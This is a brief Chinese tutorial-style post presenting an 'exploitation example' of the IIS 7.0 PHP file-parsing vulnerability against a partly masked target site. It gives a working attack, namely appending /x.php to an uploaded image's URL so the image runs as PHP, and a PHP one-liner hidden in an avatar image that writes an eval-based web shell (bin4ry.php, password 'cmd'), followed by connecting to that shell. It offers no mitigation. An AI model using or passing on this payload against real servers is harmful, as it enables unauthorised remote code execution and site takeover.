本文主要是介绍IIS7.0 php 错误文件解析漏洞利用实例,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
得到 www.xxxxxxxxi.com web服务为IIS7.0
www.xxxxxxxxi.com/robots.txt后面加上/任意字符.php成功解析为php
注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马
<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>
如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话木马,密码cmd
上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php
用一句话木马连接
这篇关于IIS7.0 php 错误文件解析漏洞利用实例的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!